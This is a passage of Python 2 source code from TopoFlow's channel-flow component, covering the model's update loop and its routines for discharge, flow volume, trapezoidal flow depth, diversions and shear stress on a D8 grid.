        self.status = 'updating'  # (OpenMI 2.0 convention)

        #-------------------------------------------------------
        # There may be times where we want to call this method
        # even if component is not the driver.  But note that
        # the TopoFlow driver also makes this same call.
        #-------------------------------------------------------
        if (self.mode == 'driver'):
            self.print_time_and_value(self.Q_outlet, 'Q_out', '[m^3/s]')
                                      ### interval=0.5)  # [seconds]

        # For testing (5/19/12)
        # self.print_time_and_value(self.Q_outlet, 'Q_out', '[m^3/s]  CHANNEL')
            
        ## DEBUG = True
        DEBUG = False
 
        #-------------------------
        # Update computed values
        #-------------------------
        if (DEBUG): print '#### Calling update_R()...'
        self.update_R()
        if (DEBUG): print '#### Calling update_R_integral()...'
        self.update_R_integral()
        if (DEBUG): print '#### Calling update_discharge()...'
        self.update_discharge()
        if (DEBUG): print '#### Calling update_diversions()...'
        self.update_diversions()
        if (DEBUG): print '#### Calling update_flow_volume()...'
        self.update_flow_volume()
        if (DEBUG): print '#### Calling update_flow_depth()...'
        self.update_flow_depth()
        #-----------------------------------------------------------------
        if not(self.DYNAMIC_WAVE):
            if (DEBUG): print '#### Calling update_trapezoid_Rh()...'
            self.update_trapezoid_Rh()
            # print 'Rhmin, Rhmax =', self.Rh.min(), self.Rh.max()a
        #-----------------------------------------------------------------
        # (9/9/14) Moved this here from update_velocity() methods.
        #-----------------------------------------------------------------        
        if not(self.KINEMATIC_WAVE):
            if (DEBUG): print '#### Calling update_free_surface_slope()...' 
            self.update_free_surface_slope()
        if (DEBUG): print '#### Calling update_shear_stress()...'
        self.update_shear_stress()
        if (DEBUG): print '#### Calling update_shear_speed()...'
        self.update_shear_speed()  
        #-----------------------------------------------------------------
        # Must update friction factor before velocity for DYNAMIC_WAVE.
        #-----------------------------------------------------------------        
        if (DEBUG): print '#### Calling update_friction_factor()...'
        self.update_friction_factor()      
        #-----------------------------------------------------------------          
        if (DEBUG): print '#### Calling update_velocity()...'
        self.update_velocity()
        self.update_velocity_on_edges()     # (set to zero)
        if (DEBUG): print '#### Calling update_froude_number()...'
        self.update_froude_number()
        #-----------------------------------------------------------------
##        print 'Rmin, Rmax =', self.R.min(), self.R.max()
##        print 'Qmin,  Qmax =',  self.Q.min(), self.Q.max()
##        print 'umin,  umax =',  self.u.min(), self.u.max()
##        print 'dmin,  dmax =',  self.d.min(), self.d.max()
##        print 'nmin,  nmax =',  self.nval.min(), self.nval.max()
##        print 'Rhmin, Rhmax =', self.Rh.min(), self.Rh.max()
##        print 'Smin,  Smax =',  self.S_bed.min(), self.S_bed.max()
        if (DEBUG): print '#### Calling update_outlet_values()...'
        self.update_outlet_values()
        if (DEBUG): print '#### Calling update peak values()...'
        self.update_peak_values()
        if (DEBUG): print '#### Calling update_Q_out_integral()...'
        self.update_Q_out_integral()

        #---------------------------------------------
        # This takes extra time and is now done
        # only at the end, in finalize().  (8/19/13)
        #---------------------------------------------
        # But then "topoflow_driver" doesn't get
        # correctly updated values for some reason.
        #---------------------------------------------
        ## self.update_mins_and_maxes()
        
        #------------------------
        # Check computed values
        #------------------------
        D_OK = self.check_flow_depth()
        U_OK = self.check_flow_velocity()
        OK   = (D_OK and U_OK)

        #-------------------------------------------
        # Read from files as needed to update vars 
        #-----------------------------------------------------
        # NB! This is currently not needed for the "channel
        # process" because values don't change over time and
        # read_input_files() is called by initialize().
        #-----------------------------------------------------
        # if (self.time_index > 0):
        #     self.read_input_files()

        #----------------------------------------------
        # Write user-specified data to output files ?
        #----------------------------------------------
        # Components use own self.time_sec by default.
        #-----------------------------------------------
        if (DEBUG): print '#### Calling write_output_files()...'
        self.write_output_files()
        ## self.write_output_files( time_seconds )

        #-----------------------------
        # Update internal clock
        # after write_output_files()
        #-----------------------------
        if (DEBUG): print '#### Calling update_time()'
        self.update_time( dt )
        
        if (OK):
            self.status = 'updated'  # (OpenMI 2.0 convention)
        else:
            self.status = 'failed'
            self.DONE   = True
            
    #   update()   
    #-------------------------------------------------------------------
    def finalize(self):

        #---------------------------------------------------
        # We can compute mins and maxes in the final grids
        # here, but the framework will not then pass them
        # to any component (e.g. topoflow_driver) that may
        # need them.
        #---------------------------------------------------
        REPORT = True
        self.update_mins_and_maxes( REPORT=REPORT )  ## (2/6/13)
        self.print_final_report(comp_name='Channels component')
        
        self.status = 'finalizing'  # (OpenMI)
        self.close_input_files()    # TopoFlow input "data streams"
        self.close_output_files()
        self.status = 'finalized'   # (OpenMI)

        #---------------------------
        # Release all of the ports
        #----------------------------------------
        # Make this call in "finalize()" method
        # of the component's CCA Imple file
        #----------------------------------------
        # self.release_cca_ports( d_services )
        
    #   finalize()
    #-------------------------------------------------------------------
    def set_computed_input_vars(self):

        #---------------------------------------------------------------    
        # Note: The initialize() method calls initialize_config_vars()
        #       (in BMI_base.py), which calls this method at the end.
        #--------------------------------------------------------------
        cfg_extension = self.get_attribute( 'cfg_extension' ).lower()
        # cfg_extension = self.get_cfg_extension().lower()
        self.KINEMATIC_WAVE = ("kinematic" in cfg_extension)
        self.DIFFUSIVE_WAVE = ("diffusive" in cfg_extension)
        self.DYNAMIC_WAVE   = ("dynamic"   in cfg_extension)

        ##########################################################
        # (5/17/12) If MANNING, we need to set z0vals to -1 so
        # they are always defined for use with new framework.
        ##########################################################
        if (self.MANNING):
            if (self.nval != None):
                self.nval = np.float64( self.nval )  #### 10/9/10, NEED
                self.nval_min = self.nval.min()
                self.nval_max = self.nval.max()
            #-----------------------------------
            self.z0val     = np.float64(-1)
            self.z0val_min = np.float64(-1)
            self.z0val_max = np.float64(-1)
            
        if (self.LAW_OF_WALL):
            if (self.z0val != None):
                self.z0val = np.float64( self.z0val )  #### (10/9/10)
                self.z0val_min = self.z0val.min()
                self.z0val_max = self.z0val.max()
            #-----------------------------------
            self.nval      = np.float64(-1)
            self.nval_min  = np.float64(-1)
            self.nval_max  = np.float64(-1)
            
        #-------------------------------------------
        # These currently can't be set to anything
        # else in the GUI, but need to be defined.
        #-------------------------------------------
        self.code_type  = 'Grid'
        self.slope_type = 'Grid'

        #---------------------------------------------------------
        # Make sure that all "save_dts" are larger or equal to
        # the specified process dt.  There is no point in saving
        # results more often than they change.
        # Issue a message to this effect if any are smaller ??
        #---------------------------------------------------------
        self.save_grid_dt   = np.maximum(self.save_grid_dt,   self.dt)
        self.save_pixels_dt = np.maximum(self.save_pixels_dt, self.dt)
        
        #---------------------------------------------------
        # This is now done in CSDMS_base.read_config_gui()
        # for any var_name that starts with "SAVE_".
        #---------------------------------------------------
        # self.SAVE_Q_GRID = (self.SAVE_Q_GRID == 'Yes')
        
    #   set_computed_input_vars()
    #-------------------------------------------------------------------
    def initialize_d8_vars(self):

        #---------------------------------------------
        # Compute and store a variety of (static) D8
        # flow grid variables.  Embed structure into
        # the "channel_base" component.
        #---------------------------------------------
        self.d8 = d8_base.d8_component()
        ###############################################
        # (5/13/10)  Do next line here for now, until
        # the d8 cfg_file includes static prefix.
        # Same is done in GW_base.py.
        ###############################################
        # tf_d8_base.read_grid_info() also needs
        # in_directory to be set. (10/27/11)
        ###############################################
        
        #--------------------------------------------------         
        # D8 component builds its cfg filename from these  
        #--------------------------------------------------      
        self.d8.site_prefix  = self.site_prefix
        self.d8.in_directory = self.in_directory
        self.d8.initialize( cfg_file=None,
                            SILENT=self.SILENT,
                            REPORT=self.REPORT )
        
        ## self.code = self.d8.code   # Don't need this.
        
        #-------------------------------------------      
        # We'll need this once we shift from using
        # "tf_d8_base.py" to the new "d8_base.py"
        #-------------------------------------------
        # self.d8.update(self.time, SILENT=False, REPORT=True)

    #   initialize_d8_vars()
    #-------------------------------------------------------------
    def initialize_computed_vars(self):
              
        #-----------------------------------------------
        # Convert bank angles from degrees to radians. 
        #-----------------------------------------------
        self.angle = self.angle * self.deg_to_rad  # [radians]
        
        #------------------------------------------------
        # 8/29/05.  Multiply ds by (unitless) sinuosity
        # Orig. ds is used by subsurface flow
        #------------------------------------------------
        # NB!  We should also divide slopes in S_bed by
        # the sinuosity, as now done here.
        #----------------------------------------------------
        # NB!  This saves a modified version of ds that
        #      is only used within the "channels" component.
        #      The original "ds" is stored within the
        #      topoflow model component and is used for
        #      subsurface flow, etc.
        #----------------------------------------------------
        ### self.d8.ds_chan = (self.sinu * ds)
        ### self.ds = (self.sinu * self.d8.ds)
        self.d8.ds = (self.sinu * self.d8.ds)  ### USE LESS MEMORY

        ###################################################
        ###################################################
        ### S_bed = (S_bed / self.sinu)     #*************
        self.slope = (self.slope / self.sinu)
        self.S_bed  = self.slope
        ###################################################
        ###################################################
        
        #---------------------------
        # Initialize spatial grids
        #-----------------------------------------------
        # NB!  It is not a good idea to initialize the
        # water depth grid to a nonzero scalar value.
        #-----------------------------------------------
        print 'Initializing u, f, d grids...'
        self.u = np.zeros([self.ny, self.nx], dtype='Float64')
        self.f = np.zeros([self.ny, self.nx], dtype='Float64')
        self.d = np.zeros([self.ny, self.nx], dtype='Float64') + self.d0

        #########################################################
        # Add this on (2/3/13) so make the TF driver happy
        # during its initialize when it gets reference to R.
        # But in "update_R()", be careful not to break the ref.
        # "Q" may be subject to the same issue.
        #########################################################
        self.Q = np.zeros([self.ny, self.nx], dtype='Float64')
        self.R = np.zeros([self.ny, self.nx], dtype='Float64')

        #---------------------------------------------------
        # Initialize new grids. Is this needed?  (9/13/14)
        #---------------------------------------------------
        self.tau    = np.zeros([self.ny, self.nx], dtype='Float64')
        self.u_star = np.zeros([self.ny, self.nx], dtype='Float64')
        self.froude = np.zeros([self.ny, self.nx], dtype='Float64')
                        
        #---------------------------------------
        # These are used to check mass balance
        #---------------------------------------
        self.vol_R = self.initialize_scalar( 0, dtype='float64')
        self.vol_Q = self.initialize_scalar( 0, dtype='float64')
        
        #-------------------------------------------
        # Make sure all slopes are valid & nonzero
        # since otherwise flow will accumulate
        #-------------------------------------------
        if (self.KINEMATIC_WAVE):    
            self.remove_bad_slopes()      #(3/8/07. Only Kin Wave case)
        
        #----------------------------------------
        # Initial volume of water in each pixel
        #-----------------------------------------------------------
        # Note: angles were read as degrees & converted to radians
        #-----------------------------------------------------------
        L2         = self.d * np.tan(self.angle)
        self.A_wet = self.d * (self.width + L2)
        self.P_wet = self.width + (np.float64(2) * self.d / np.cos(self.angle) )
        self.vol   = self.A_wet * self.d8.ds   # [m3]

        #-------------------------------------------------------        
        # Note: depth is often zero at the start of a run, and
        # both width and then P_wet are also zero in places.
        # Therefore initialize Rh as shown.
        #-------------------------------------------------------
        self.Rh = np.zeros([self.ny, self.nx], dtype='Float64')
        ## self.Rh = self.A_wet / self.P_wet   # [m]
        ## print 'P_wet.min() =', self.P_wet.min()
        ## print 'width.min() =', self.width.min()
       
        ## self.initialize_diversion_vars()    # (9/22/14)
        self.initialize_outlet_values()
        self.initialize_peak_values()
        self.initialize_min_and_max_values()  ## (2/3/13)

        #########################################
        # Maybe save all refs in a dictionary
        # called "self_values" here ? (2/19/13)
        # Use a "reverse" var_name mapping?
        # inv_map = dict(zip(map.values(), map.keys()))
        #########################################
        
##        w  = np.where( self.width <= 0 )
##        nw = np.size( w[0] )   # (This is correct for 1D or 2D.)
##        if (nw > 0):
##            print 'WARNING:'
##            print 'Number of locations where width==0 =', nw
##            if (nw < 10):
##                print 'locations =', w
##            print ' '

    #   initialize_computed_vars()
    #-------------------------------------------------------------
    def initialize_diversion_vars(self):

        #-----------------------------------------
        # Compute source IDs from xy coordinates
        #-----------------------------------------
        source_rows     = np.int32( self.sources_y / self.ny )
        source_cols     = np.int32( self.sources_x / self.nx )
        self.source_IDs = (source_rows, source_cols)
        ## self.source_IDs = (source_rows * self.nx) + source_cols
   
        #---------------------------------------
        # Compute sink IDs from xy coordinates
        #---------------------------------------
        sink_rows     = np.int32( self.sinks_y / self.ny )
        sink_cols     = np.int32( self.sinks_x / self.nx )
        self.sink_IDs = (sink_rows, sink_cols)
        ## self.sink_IDs = (sink_rows * self.nx) + sink_cols
        
        #-------------------------------------------------
        # Compute canal entrance IDs from xy coordinates
        #-------------------------------------------------
        canal_in_rows     = np.int32( self.canals_in_y / self.ny )
        canal_in_cols     = np.int32( self.canals_in_x / self.nx )
        self.canal_in_IDs = (canal_in_rows, canal_in_cols)
        ## self.canal_in_IDs = (canal_in_rows * self.nx) + canal_in_cols
        
        #---------------------------------------------
        # Compute canal exit IDs from xy coordinates
        #---------------------------------------------
        canal_out_rows     = np.int32( self.canals_out_y / self.ny )
        canal_out_cols     = np.int32( self.canals_out_x / self.nx )
        self.canal_out_IDs = (canal_out_rows, canal_out_cols)
        ## self.canal_out_IDs = (canal_out_rows * self.nx) + canal_out_cols

        #--------------------------------------------------
        # This will be computed from Q_canal_fraction and
        # self.Q and then passed back to Diversions
        #--------------------------------------------------
        self.Q_canals_in = np.array( self.n_sources, dtype='float64' )

    #   initialize_diversion_vars()
    #-------------------------------------------------------------------
    def initialize_outlet_values(self):

        #---------------------------------------------------
        # Note:  These are retrieved and used by TopoFlow
        #        for the stopping condition.  TopoFlow
        #        receives a reference to these, but in
        #        order to see the values change they need
        #        to be stored as mutable, 1D numpy arrays.
        #---------------------------------------------------
        # Note:  Q_last is internal to TopoFlow.
        #---------------------------------------------------        
        # self.Q_outlet = self.Q[ self.outlet_ID ]
        self.Q_outlet = self.initialize_scalar(0, dtype='float64')
        self.u_outlet = self.initialize_scalar(0, dtype='float64')
        self.d_outlet = self.initialize_scalar(0, dtype='float64')
        self.f_outlet = self.initialize_scalar(0, dtype='float64')
          
    #   initialize_outlet_values()  
    #-------------------------------------------------------------------
    def initialize_peak_values(self):

        #-------------------------
        # Initialize peak values
        #-------------------------
        self.Q_peak  = self.initialize_scalar(0, dtype='float64')
        self.T_peak  = self.initialize_scalar(0, dtype='float64')
        self.u_peak  = self.initialize_scalar(0, dtype='float64')
        self.Tu_peak = self.initialize_scalar(0, dtype='float64') 
        self.d_peak  = self.initialize_scalar(0, dtype='float64')
        self.Td_peak = self.initialize_scalar(0, dtype='float64')

    #   initialize_peak_values()
    #-------------------------------------------------------------------
    def initialize_min_and_max_values(self):

        #-------------------------------
        # Initialize min & max values
        # (2/3/13), for new framework.
        #-------------------------------
        v = 1e6
        self.Q_min = self.initialize_scalar(v,  dtype='float64')
        self.Q_max = self.initialize_scalar(-v, dtype='float64')
        self.u_min = self.initialize_scalar(v,  dtype='float64')
        self.u_max = self.initialize_scalar(-v, dtype='float64')
        self.d_min = self.initialize_scalar(v,  dtype='float64')
        self.d_max = self.initialize_scalar(-v, dtype='float64')

    #   initialize_min_and_max_values() 
    #-------------------------------------------------------------------
    # def update_excess_rainrate(self):
    def update_R(self):

        #----------------------------------------
        # Compute the "excess rainrate", R.
        # Each term must have same units: [m/s]
        # Sum = net gain/loss rate over pixel.
        #----------------------------------------------------
        # R can be positive or negative.  If negative, then
        # water is removed from the surface at rate R until
        # surface water is consumed.
        #--------------------------------------------------------------
        # P  = precip_rate   [m/s]  (converted by read_input_data()).
        # SM = snowmelt rate [m/s]
        # GW = seep rate     [m/s]  (water_table intersects surface)
        # ET = evap rate     [m/s]
        # IN = infil rate    [m/s]
        # MR = icemelt rate  [m/s]

        #------------------------------------------------------------
        # Use refs to other comp vars from new framework. (5/18/12)
        #------------------------------------------------------------         
        P  = self.P_rain  # (This is now liquid-only precip. 9/14/14)
        SM = self.SM
        GW = self.GW
        ET = self.ET
        IN = self.IN
        MR = self.MR
        
##        if (self.DEBUG):
##            print 'At time:', self.time_min, ', P =', P, '[m/s]'

        #--------------
        # For testing
        #--------------        
##        print '(Pmin,  Pmax)  =', P.min(),  P.max()
##        print '(SMmin, SMmax) =', SM.min(), SM.max()
##        print '(GWmin, GWmax) =', GW.min(), GW.max()
##        print '(ETmin, ETmax) =', ET.min(), ET.max()
##        print '(INmin, INmax) =', IN.min(), IN.max()
##        print '(MRmin, MRmax) =', MR.min(), MR.max()
##        # print '(Hmin,  Hmax)  =', H.min(), H.max()
##        print ' '
        
        self.R = (P + SM + GW + MR) - (ET + IN)
            
    #   update_R()
    #-------------------------------------------------------------------
    def update_R_integral(self):

        #-----------------------------------------------
        # Update mass total for R, sum over all pixels
        #-----------------------------------------------   
        volume = np.double(self.R * self.da * self.dt)  # [m^3]
        if (np.size(volume) == 1):
            self.vol_R += (volume * self.rti.n_pixels)
        else:
            self.vol_R += np.sum(volume)

    #   update_R_integral()           
    #-------------------------------------------------------------------  
    def update_discharge(self):

        #---------------------------------------------------------
        # The discharge grid, Q, gives the flux of water _out_
        # of each grid cell.  This entire amount then flows
        # into one of the 8 neighbor grid cells, as indicated
        # by the D8 flow code. The update_flow_volume() function
        # is called right after this one in update() and uses
        # the Q grid.
        #---------------------------------------------------------
        # 7/15/05.  The cross-sectional area of a trapezoid is
        # given by:    Ac = d * (w + (d * tan(theta))),
        # where w is the bottom width.  If we were to
        # use: Ac = w * d, then we'd have Ac=0 when w=0.
        # We also need angle units to be radians.
        #---------------------------------------------------------

        #-----------------------------
        # Compute the discharge grid
        #------------------------------------------------------ 
        # A_wet is initialized in initialize_computed_vars().
        # A_wet is updated in update_trapezoid_Rh().
        #------------------------------------------------------     
        ### self.Q = np.float64(self.u * A_wet)
        self.Q[:] = self.u * self.A_wet   ## (2/19/13, in place)

        #--------------
        # For testing
        #--------------  
##        print '(umin,   umax)  =', self.u.min(), self.u.max()
##        print '(d0min, d0max)  =', self.d0.min(), self.d0.max()
##        print '(dmin,   dmax)  =', self.d.min(), self.d.max()
##        print '(amin,   amax)  =', self.angle.min(), self.angle.max()
##        print '(wmin,   wmax)  =', self.width.min(), self.width.max()
##        print '(Qmin,   Qmax)  =', self.Q.min(),  self.Q.max()
##        print '(L2min,  L2max) =', L2.min(), L2.max()
##        print '(Qmin,   Qmax)  =', self.Q.min(),  self.Q.max()
     
        #--------------
        # For testing
        #--------------
        # print 'dmin, dmax =', self.d.min(), self.d.max()
        # print 'umin, umax =', self.u.min(), self.u.max()
        # print 'Qmin, Qmax =', self.Q.min(), self.Q.max()
        # print ' '        
        # print 'u(outlet) =', self.u[self.outlet_ID]
        # print 'Q(outlet) =', self.Q[self.outlet_ID]  ########
          
        #----------------------------------------------------
        # Wherever depth is less than z0, assume that water
        # is not flowing and set u and Q to zero.
        # However, we also need (d gt 0) to avoid a divide
        # by zero problem, even when numerators are zero.
        #----------------------------------------------------
        # FLOWING = (d > (z0/aval))
        #*** FLOWING[self.d8.noflow_IDs] = False    ;******
        # u = (u * FLOWING)
        # Q = (Q * FLOWING)
        # d = np.maximum(d, 0.0)    ;(allow depths lt z0, if gt 0.)

    #   update_discharge()
    #-------------------------------------------------------------------
    def update_diversions(self):

        #--------------------------------------------------------------    
        # Note: The Channel component requests the following input
        #       vars from the Diversions component by including
        #       them in its "get_input_vars()":
        #       (1) Q_sources, Q_sources_x, Q_sources_y
        #       (2) Q_sinks,   Q_sinks_x, Q_sinks_y
        #       (3) Q_canals_out, Q_canals_out_x, Q_canals_out_y
        #       (4) Q_canals_fraction, Q_canals_in_x, Q_canals_in_y.
        
        #       source_IDs are computed from (x,y) coordinates during
        #       initialize().
        #
        #       Diversions component needs to get Q_canals_in from the
        #       Channel component.
        #--------------------------------------------------------------
        # Note: This *must* be called after update_discharge() and
        #       before update_flow_volume().
        #--------------------------------------------------------------
        # Note: The Q grid stores the volume flow rate *leaving* each
        #       grid cell in the domain.  For sources, an extra amount
        #       is leaving the cell which can flow into its D8 parent
        #       cell.  For sinks, a lesser amount is leaving the cell
        #       toward the D8 parent.
        #--------------------------------------------------------------
        # Note: It is not enough to just update Q and then call the
        #       update_flow_volume() method.  This is because it
        #       won't update the volume in the channels in the grid
        #       cells that the extra discharge is leaving from.
        #--------------------------------------------------------------
        # If a grid cell contains a "source", then an additional Q
        # will flow *into* that grid cell and increase flow volume.
        #-------------------------------------------------------------- 

        #-------------------------------------------------------------         
        # This is not fully tested but runs.  However, the Diversion
        # vars are still computed even when Diversions component is
        # disabled. So it slows things down somewhat.
        #-------------------------------------------------------------              
        return
        ########################
        ########################
        
        #----------------------------------------            
        # Update Q and vol due to point sources
        #----------------------------------------
        ## if (hasattr(self, 'source_IDs')): 
        if (self.n_sources > 0): 
			self.Q[ self.source_IDs ]   += self.Q_sources
			self.vol[ self.source_IDs ] += (self.Q_sources * self.dt)

        #--------------------------------------            
        # Update Q and vol due to point sinks
        #--------------------------------------
        ## if (hasattr(self, 'sink_IDs')):
        if (self.n_sinks > 0): 
			self.Q[ self.sink_IDs ]   -= self.Q_sinks
			self.vol[ self.sink_IDs ] -= (self.Q_sinks * self.dt)
 
        #---------------------------------------            
        # Update Q and vol due to point canals
        #---------------------------------------    
        ## if (hasattr(self, 'canal_in_IDs')):
        if (self.n_canals > 0):   
			#-----------------------------------------------------------------
			# Q grid was just modified.  Apply the canal diversion fractions
			# to compute the volume flow rate into upstream ends of canals.
			#-----------------------------------------------------------------
			Q_canals_in = self.Q_canals_fraction * self.Q[ self.canal_in_IDs ]
			self.Q_canals_in = Q_canals_in

			#----------------------------------------------------        
			# Update Q and vol due to losses at canal entrances
			#----------------------------------------------------
			self.Q[ self.canal_in_IDs ]   -= Q_canals_in
			self.vol[ self.canal_in_IDs ] -= (Q_canals_in * self.dt)        

			#-------------------------------------------------       
			# Update Q and vol due to gains at canal exits.
			# Diversions component accounts for travel time.
			#-------------------------------------------------        
			self.Q[ self.canal_out_IDs ]   += self.Q_canals_out
			self.vol[ self.canal_out_IDs ] += (self.Q_canals_out * self.dt)    
        
    #   update_diversions()
    #-------------------------------------------------------------------
    def update_flow_volume(self):

        #-----------------------------------------------------------
        # Notes: This function must be called after
        #        update_discharge() and update_diversions().
        #-----------------------------------------------------------        
        # Notes: Q   = surface discharge  [m^3/s]
        #        R   = excess precip. rate  [m/s]
        #        da  = pixel area  [m^2]
        #        dt  = channel flow timestep  [s]
        #        vol = total volume of water in pixel [m^3]
        #        v2  = temp version of vol
        #        w1  = IDs of pixels that...
        #        p1  = IDs of parent pixels that...
        #-----------------------------------------------------------
        dt = self.dt  # [seconds]

        #----------------------------------------------------
        # Add contribution (or loss ?) from excess rainrate
        #----------------------------------------------------
        # Contributions over entire grid cell from rainfall,
        # snowmelt, icemelt and baseflow (minus losses from
        # evaporation and infiltration) are assumed to flow
        # into the channel within the grid cell.
        # Note that R is allowed to be negative.
        #----------------------------------------------------        
        self.vol += (self.R * self.da) * dt   # (in place)
    
        #-----------------------------------------
        # Add contributions from neighbor pixels
        #-------------------------------------------------------------
        # Each grid cell passes flow to *one* downstream neighbor.
        # Note that multiple grid cells can flow toward a given grid
        # cell, so a grid cell ID may occur in d8.p1 and d8.p2, etc.
        #-------------------------------------------------------------
        # (2/16/10)  RETEST THIS.  Before, a copy called "v2" was
        # used but this doesn't seem to be necessary.
        #-------------------------------------------------------------        
        if (self.d8.p1_OK):    
            self.vol[ self.d8.p1 ] += (dt * self.Q[self.d8.w1])
        if (self.d8.p2_OK):    
            self.vol[ self.d8.p2 ] += (dt * self.Q[self.d8.w2])
        if (self.d8.p3_OK):    
            self.vol[ self.d8.p3 ] += (dt * self.Q[self.d8.w3])
        if (self.d8.p4_OK):    
            self.vol[ self.d8.p4 ] += (dt * self.Q[self.d8.w4])
        if (self.d8.p5_OK):    
            self.vol[ self.d8.p5 ] += (dt * self.Q[self.d8.w5])
        if (self.d8.p6_OK):    
            self.vol[ self.d8.p6 ] += (dt * self.Q[self.d8.w6])
        if (self.d8.p7_OK):    
            self.vol[ self.d8.p7 ] += (dt * self.Q[self.d8.w7])
        if (self.d8.p8_OK):    
            self.vol[ self.d8.p8 ] += (dt * self.Q[self.d8.w8])

        #----------------------------------------------------
        # Subtract the amount that flows out to D8 neighbor
        #----------------------------------------------------
        self.vol -= (self.Q * dt)  # (in place)
   
        #--------------------------------------------------------
        # While R can be positive or negative, the surface flow
        # volume must always be nonnegative. This also ensures
        # that the flow depth is nonnegative.  (7/13/06)
        #--------------------------------------------------------
        ## self.vol = np.maximum(self.vol, 0.0)
        ## self.vol[:] = np.maximum(self.vol, 0.0)  # (2/19/13)
        np.maximum( self.vol, 0.0, self.vol )  # (in place)
        
    #   update_flow_volume
    #-------------------------------------------------------------------
    def update_flow_depth(self):

        #-----------------------------------------------------------
        # Notes: 7/18/05.  Modified to use the equation for volume
        #        of a trapezoidal channel:  vol = Ac * ds, where
        #        Ac=d*[w + d*tan(t)], and to solve the resulting
        #        quadratic (discarding neg. root) for new depth, d.

        #        8/29/05.  Now original ds is used for subsurface
        #        flow and there is a ds_chan which can include a
        #        sinuosity greater than 1.  This may be especially
        #        important for larger pixel sizes.

        #        Removed (ds > 1) here which was only meant to
        #        avoid a "divide by zero" error at pixels where
        #        (ds eq 0).  This isn't necessary since the
        #        Flow_Lengths function in utils_TF.pro never
        #        returns a value of zero.
        #----------------------------------------------------------
        #        Modified to avoid double where calls, which
        #        reduced cProfile run time for this method from
        #        1.391 to 0.644.  (9/23/14)
        #----------------------------------------------------------
        # Commented this out on (2/18/10) because it doesn't
        #           seem to be used anywhere now.  Checked all
        #           of the Channels components.
        #----------------------------------------------------------        
        # self.d_last = self.d.copy()

        #-----------------------------------        
        # Make some local aliases and vars
        #-----------------------------------------------------------
        # Note: angles were read as degrees & converted to radians
        #-----------------------------------------------------------
        d = self.d
        width = self.width  ###
        angle = self.angle
        SCALAR_ANGLES = (np.size(angle) == 1)
        
        #------------------------------------------------------
        # (2/18/10) New code to deal with case where the flow
        #           depth exceeds a bankfull depth.
        #           For now, d_bankfull is hard-coded.
        #
        #           CHANGE Manning's n here, too?
        #------------------------------------------------------
        d_bankfull = 4.0  # [meters]
        ################################
        wb = (self.d > d_bankfull)  # (array of True or False)
        self.width[ wb ]  = self.d8.dw[ wb ]
        if not(SCALAR_ANGLES):
            self.angle[ wb ] = 0.0
     
#         w_overbank = np.where( d > d_bankfull )
#         n_overbank = np.size( w_overbank[0] )
#         if (n_overbank != 0):
#             width[ w_overbank ] = self.d8.dw[ w_overbank ]
#             if not(SCALAR_ANGLES): angle[w_overbank] = 0.0

        #------------------------------------------------------
        # (2/18/10) New code to deal with case where the top
        #           width exceeds the grid cell width, dw.
        #------------------------------------------------------            
        top_width = width + (2.0 * d * np.sin(self.angle))
        wb = (top_width > self.d8.dw)  # (array of True or False)
        self.width[ wb ] = self.d8.dw[ wb ]
        if not(SCALAR_ANGLES):
            self.angle[ wb ] = 0.0
                    
#         wb = np.where(top_width > self.d8.dw)
#         nb = np.size(w_bad[0])
#         if (nb != 0):
#             width[ wb ] = self.d8.dw[ wb ]
#             if not(SCALAR_ANGLES): angle[ wb ] = 0.0

        #----------------------------------
        # Is "angle" a scalar or a grid ?
        #----------------------------------
        if (SCALAR_ANGLES):
            if (angle == 0.0):    
                d = self.vol / (width * self.d8.ds)
            else:
                denom = 2.0 * np.tan(angle)
                arg   = 2.0 * denom * self.vol / self.d8.ds
                arg  += width**(2.0)
                d     = (np.sqrt(arg) - width) / denom
        else:
            #-----------------------------------------------------
            # Pixels where angle is 0 must be handled separately
            #-----------------------------------------------------
            w1 = ( angle == 0 )  # (arrays of True or False)
            w2 = np.invert( w1 )
            #-----------------------------------
            A_top = width[w1] * self.d8.ds[w1]          
            d[w1] = self.vol[w1] / A_top
            #-----------------------------------               
            denom  = 2.0 * np.tan(angle[w2])
            arg    = 2.0 * denom * self.vol[w2] / self.d8.ds[w2]
            arg   += width[w2]**(2.0)
            d[w2] = (np.sqrt(arg) - width[w2]) / denom

            #-----------------------------------------------------
            # Pixels where angle is 0 must be handled separately
            #-----------------------------------------------------
#             wz   = np.where( angle == 0 )
#             nwz  = np.size( wz[0] )
#             wzc  = np.where( angle != 0 )
#             nwzc = np.size( wzc[0] )
#             
#             if (nwz != 0):
#                 A_top = width[wz] * self.d8.ds[wz]
#                 ## A_top = self.width[wz] * self.d8.ds_chan[wz]            
#                 d[wz] = self.vol[wz] / A_top
#             
#             if (nwzc != 0):    
#                 term1  = 2.0 * np.tan(angle[wzc])
#                 arg    = 2.0 * term1 * self.vol[wzc] / self.d8.ds[wzc]
#                 arg   += width[wzc]**(2.0)
#                 d[wzc] = (np.sqrt(arg) - width[wzc]) / term1

        #------------------------------------------
        # Set depth values on edges to zero since
        # they become spikes (no outflow) 7/15/06
        #------------------------------------------    
        d[ self.d8.noflow_IDs ] = 0.0

        #------------------------------------------------
        # 4/19/06.  Force flow depth to be positive ?
        #------------------------------------------------
        # This seems to be needed with the non-Richards
        # infiltration routines when starting with zero
        # depth everywhere, since all water infiltrates
        # for some period of time.  It also seems to be
        # needed more for short rainfall records to
        # avoid a negative flow depth error.
        #------------------------------------------------
        # 7/13/06.  Still needed for Richards method
        #------------------------------------------------
        ## self.d = np.maximum(d, 0.0)
        np.maximum(d, 0.0, self.d)  # (2/19/13, in place)

        #-------------------------------------------------        
        # Find where d <= 0 and save for later (9/23/14)
        #-------------------------------------------------
        self.d_is_pos = (self.d > 0)
        self.d_is_neg = np.invert( self.d_is_pos )
        
    #   update_flow_depth
    #-------------------------------------------------------------------
    def update_free_surface_slope(self):

        #-----------------------------------------------------------
        # Notes:  It is assumed that the flow directions don't
        #         change even though the free surface is changing.
        #-----------------------------------------------------------
        delta_d     = (self.d - self.d[self.d8.parent_IDs])
        self.S_free[:] = self.S_bed + (delta_d / self.d8.ds)
        
        #--------------------------------------------
        # Don't do this; negative slopes are needed
        # to decelerate flow in dynamic wave case
        # and for backwater effects.
        #--------------------------------------------
        # Set negative slopes to zero
        #------------------------------
        ###  self.S_free = np.maximum(self.S_free, 0)

    #   update_free_surface_slope()
    #-------------------------------------------------------------------
    def update_shear_stress(self):

        #--------------------------------------------------------
        # Notes: 9/9/14.  Added so shear stress could be shared.
        #        This uses the depth-slope product.
        #--------------------------------------------------------
        if (self.KINEMATIC_WAVE):
        	slope = self.S_bed
        else:
            slope = self.S_free
        self.tau[:] = self.rho_H2O * self.g * self.d * slope
               
    #   update_shear_stress()
